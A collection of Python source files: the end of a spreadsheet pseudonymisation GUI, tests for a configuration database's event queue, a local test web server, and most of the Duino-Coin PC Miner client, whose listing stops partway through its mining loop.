self.btn_pseudo['state'] = 'disabled'
self.resultLabel.config(style="foreOrange.Label")
temp_name = self.get_file_display_name(self._fileName.get())
self._resultOutput.set(temp_name + " is being pseudonymised")
self.config(cursor="wait")
self.update()
#df['DIGEST'] = df.identifier.apply(self.pseudo)
#del df['identifier']
df['DIGEST'] = df[self.om_variable.get()].apply(self.pseudo)
del df[self.om_variable.get()]
self._result.set(os.path.basename(temp_name))
if os.path.exists(new_name):
os.remove(new_name)
df.to_excel(new_name, index=False)
self._resultOutput.set(os.path.basename(str(self._fileName.get())) + " has been pseudonymised")
self.resultLabel.config(style="foreGreen.Label")
self.btn_pseudo['state'] = 'disabled'
self.btn_file['state'] = 'normal'
self.btn_salt['state'] = 'normal'
self.config(cursor="")
self.logger.info('Completing Pseudo: ' + self._fileName.get())
self.kill_progress()
except BaseException as error:
self.resultLabel.config(style="foreRed.Label")
self._resultOutput.set('An exception occurred: details in log file')
self.btn_pseudo['state'] = 'normal'
self.btn_file['state'] = 'normal'
self.btn_salt['state'] = 'normal'
self.logger.error('An exception occurred: {}'.format(error))
self.kill_progress()
if __name__ == "__main__":
app = App()
app.mainloop()
|
test_pubsub.py
|
# coding=utf-8
"""Test of the Configuration Database events interface."""
import time
from threading import Thread
from sip_config_db._events.event_queue import EventQueue
from sip_config_db._events.pubsub import get_subscribers, publish, subscribe
from sip_config_db import ConfigDb
DB = ConfigDb()
def test_events_subscribe():
"""Test subscribing to events."""
DB.flush_db()
object_type = 'test_object'
subscriber = 'test_subscriber'
subscribe(object_type, subscriber)
assert subscriber in get_subscribers(object_type)
def test_events_basic_usage():
"""Misc tests of the events interface."""
DB.flush_db()
event_type = 'test_event_type'
subscriber = 'test_subscriber'
object_type = 'test_object'
object_id = 'test_object_id'
# Subscribe to 'test' events with the 'test' subscriber
event_queue = subscribe(object_type, subscriber)
assert subscriber in get_subscribers(object_type)
# Publish an event.
publish(event_type, object_type=object_type, object_id=object_id)
# Keep asking for events until we get one.
while True:
event = event_queue.get()
if event:
assert event.id == '{}_event_00000000'.format(object_type)
assert event.type == event_type
assert not event.data
assert not event.origin
assert event.timestamp
assert event.object_id == object_id
assert event.object_type == object_type
assert not event.object_key
break
# There should be no published events as we already got the
# only event.
assert not event_queue.get_published_events()
# There should be one active event.
active_events = event_queue.get_processed_events()
assert len(active_events) == 1
assert active_events[0].id == '{}_event_00000000'.format(object_type)
# Global counter to verify the callback function was triggered the correct
# number of times.
CALLBACK_EVENT_COUNT = 0
def test_events_with_callback():
"""Test subscribing to events with a callback handler."""
def _callback_handler(message):
"""Event callback handler."""
global CALLBACK_EVENT_COUNT # pylint: disable=global-statement
CALLBACK_EVENT_COUNT += 1
assert 'callback_test_event_' in message['data']
# print('EVENT CALLBACK!! ', message['data'], CALLBACK_EVENT_COUNT)
def _watcher_function(queue: EventQueue, timeout: float):
"""Monitor for events."""
start_time = time.time()
while time.time() - start_time < timeout:
queue.get()
time.sleep(0.1)
DB.flush_db()
object_type = 'callback_test'
subscriber = 'test_subscriber'
event_type = 'test'
object_id = 'test-01'
# Subscribe to the 'pb' object events with the 'test' subscriber
event_queue = subscribe(object_type, subscriber,
_callback_handler)
assert subscriber in get_subscribers(object_type)
# Test using a custom watcher thread for the event loop.
thread = Thread(target=_watcher_function, args=(event_queue, 2.0,),
daemon=False)
thread.start()
for _ in range(10):
publish(event_type=event_type, object_type=object_type,
object_id=object_id)
thread.join()
assert CALLBACK_EVENT_COUNT == 10
# Test using the provided pubsub subscriber thread
thread = event_queue.pubsub().run_in_thread(sleep_time=0.01)
for _ in range(10):
publish(event_type=event_type, object_type=object_type,
object_id=object_id)
time.sleep(0.5)
thread.stop()
assert CALLBACK_EVENT_COUNT == 20
def test_events_recovery():
"""Test event recovery, eg. after a subscriber service crash."""
DB.flush_db()
event_type = 'test_event'
subscriber = 'test_subscriber'
object_type = 'test_object_type'
object_id = 'test_object_id'
# Start a subscriber that goes away. eg it crashes, or in this case is a
# temp thread that finishes after subscribing.
temp_subscriber = Thread(target=subscribe, args=[object_type, subscriber])
temp_subscriber.start()
temp_subscriber.join()
# While the subscriber is not getting events (it is a temp thread
# that has finished), some events are published.
publish(event_type, object_type=object_type, object_id=object_id,
event_data={'counter': 1})
publish(event_type, object_type=object_type, object_id=object_id,
event_data={'counter': 2})
# When the subscriber comes back, it will resubscribe but calling
# get on the event queue will not return any events as event notifications
# were missed.
event_queue = subscribe(object_type, subscriber)
event_count = 0
for _ in range(100):
event = event_queue.get()
if event:
event_count += 1
assert event_count == 0
# At this point, since we cleared the db for the test, there are no
# active (previously acknowledged) events
active_events = event_queue.get_processed_events()
assert not active_events
# Get published events without processing them (ie. process == False)
# (Events returned with process=False will not be marked as processed.
published_events = event_queue.get_published_events(process=False)
assert len(published_events) == 2
# Get published events again, this time mark as processed..
published_events = event_queue.get_published_events()
assert len(published_events) == 2
# Get published events yet again, this time there should be none as
# they have been 'processed'.
published_events = event_queue.get_published_events()
assert not published_events
# After asking for published events they are moved to the active queue.
active_events = event_queue.get_processed_events()
assert len(active_events) == 2
# If we complete the active events.
for event in active_events:
event_queue.complete_event(event.id)
# They are moved to the history queue and are no longer active.
active_events = event_queue.get_processed_events()
assert not active_events
|
webserver.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import BaseHTTPServer
import os
import threading
class Responder(object):
"""Sends a HTTP response. Used with TestWebServer."""
def __init__(self, handler):
self._handler = handler
def SendResponse(self, headers, body):
"""Sends OK response with body."""
self.SendHeaders(headers, len(body))
self.SendBody(body)
def SendResponseFromFile(self, path):
"""Sends OK response with the given file as the body."""
with open(path, 'r') as f:
self.SendResponse({}, f.read())
def SendHeaders(self, headers={}, content_length=None):
"""Sends headers for OK response."""
self._handler.send_response(200)
for field, value in headers.iteritems():
self._handler.send_header(field, value)
if content_length:
self._handler.send_header('Content-Length', content_length)
self._handler.end_headers()
def SendError(self, code):
"""Sends response for the given HTTP error code."""
self._handler.send_error(code)
def SendBody(self, body):
"""Just sends the body, no headers."""
self._handler.wfile.write(body)
class Request(object):
"""An HTTP request."""
def __init__(self, handler):
self._handler = handler
def GetPath(self):
return self._handler.path
def GetHeader(self, name):
return self._handler.headers.getheader(name)
class _BaseServer(BaseHTTPServer.HTTPServer):
"""Internal server that throws if timed out waiting for a request."""
def __init__(self, on_request, server_cert_and_key_path=None):
"""Starts the server.
It is an HTTP server if parameter server_cert_and_key_path is not provided.
Otherwise, it is an HTTPS server.
Args:
server_cert_and_key_path: path to a PEM file containing the cert and key.
if it is None, start the server as an HTTP one.
"""
class _Handler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Internal handler that just asks the server to handle the request."""
def do_GET(self):
if self.path.endswith('favicon.ico'):
self.send_error(404)
return
on_request(Request(self), Responder(self))
def log_message(self, *args, **kwargs):
"""Overriddes base class method to disable logging."""
pass
BaseHTTPServer.HTTPServer.__init__(self, ('127.0.0.1', 0), _Handler)
if server_cert_and_key_path is not None:
self._is_https_enabled = True
self._server.socket = ssl.wrap_socket(
self._server.socket, certfile=server_cert_and_key_path,
server_side=True)
else:
self._is_https_enabled = False
def handle_timeout(self):
"""Overridden from SocketServer."""
raise RuntimeError('Timed out waiting for http request')
def GetUrl(self):
"""Returns the base URL of the server."""
postfix = '://127.0.0.1:%s' % self.server_port
if self._is_https_enabled:
return 'https' + postfix
return 'http' + postfix
class WebServer(object):
"""An HTTP or HTTPS server that serves on its own thread.
Serves files from given directory but may use custom data for specific paths.
"""
def __init__(self, root_dir, server_cert_and_key_path=None):
"""Starts the server.
It is an HTTP server if parameter server_cert_and_key_path is not provided.
Otherwise, it is an HTTPS server.
Args:
root_dir: root path to serve files from. This parameter is required.
server_cert_and_key_path: path to a PEM file containing the cert and key.
if it is None, start the server as an HTTP one.
"""
self._root_dir = os.path.abspath(root_dir)
self._server = _BaseServer(self._OnRequest, server_cert_and_key_path)
self._thread = threading.Thread(target=self._server.serve_forever)
self._thread.daemon = True
self._thread.start()
self._path_data_map = {}
self._path_callback_map = {}
self._path_maps_lock = threading.Lock()
def _OnRequest(self, request, responder):
path = request.GetPath().split('?')[0]
# Serve from path -> callback and data maps.
self._path_maps_lock.acquire()
try:
if path in self._path_callback_map:
headers, body = self._path_callback_map[path](request)
if body:
responder.SendResponse(headers, body)
else:
responder.SendError(503)
return
if path in self._path_data_map:
responder.SendResponse({}, self._path_data_map[path])
return
finally:
self._path_maps_lock.release()
# Serve from file.
path = os.path.normpath(
os.path.join(self._root_dir, *path.split('/')))
if not path.startswith(self._root_dir):
responder.SendError(403)
return
if not os.path.exists(path):
responder.SendError(404)
return
responder.SendResponseFromFile(path)
def SetDataForPath(self, path, data):
self._path_maps_lock.acquire()
try:
self._path_data_map[path] = data
finally:
self._path_maps_lock.release()
def SetCallbackForPath(self, path, func):
self._path_maps_lock.acquire()
try:
self._path_callback_map[path] = func
finally:
self._path_maps_lock.release()
def GetUrl(self):
"""Returns the base URL of the server."""
return self._server.GetUrl()
def Shutdown(self):
"""Shuts down the server synchronously."""
self._server.shutdown()
self._thread.join()
class SyncWebServer(object):
"""WebServer for testing.
Incoming requests are blocked until explicitly handled.
This was designed for single thread use. All requests should be handled on
the same thread.
"""
def __init__(self):
self._server = _BaseServer(self._OnRequest)
# Recognized by SocketServer.
self._server.timeout = 10
self._on_request = None
def _OnRequest(self, request, responder):
self._on_request(responder)
self._on_request = None
def Respond(self, on_request):
"""Blocks until request comes in, then calls given handler function.
Args:
on_request: Function that handles the request. Invoked with single
parameter, an instance of Responder.
"""
if self._on_request:
raise RuntimeError('Must handle 1 request at a time.')
self._on_request = on_request
while self._on_request:
# Don't use handle_one_request, because it won't work with the timeout.
self._server.handle_request()
def RespondWithContent(self, content):
"""Blocks until request comes in, then handles it with the given content."""
def SendContent(responder):
responder.SendResponse({}, content)
self.Respond(SendContent)
def GetUrl(self):
return self._server.GetUrl()
|
PC_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + " seconds"
elif uptime == 60:
return str(round(uptime // 60)) + " minute"
elif uptime >= 60:
return str(round(uptime // 60)) + " minutes"
elif uptime == 3600:
return str(round(uptime // 3600)) + " hour"
elif uptime >= 3600:
return str(round(uptime // 3600)) + " hours"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requested_diff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rig_identiier == "y" or rig_identiier == "Y":
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identiier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
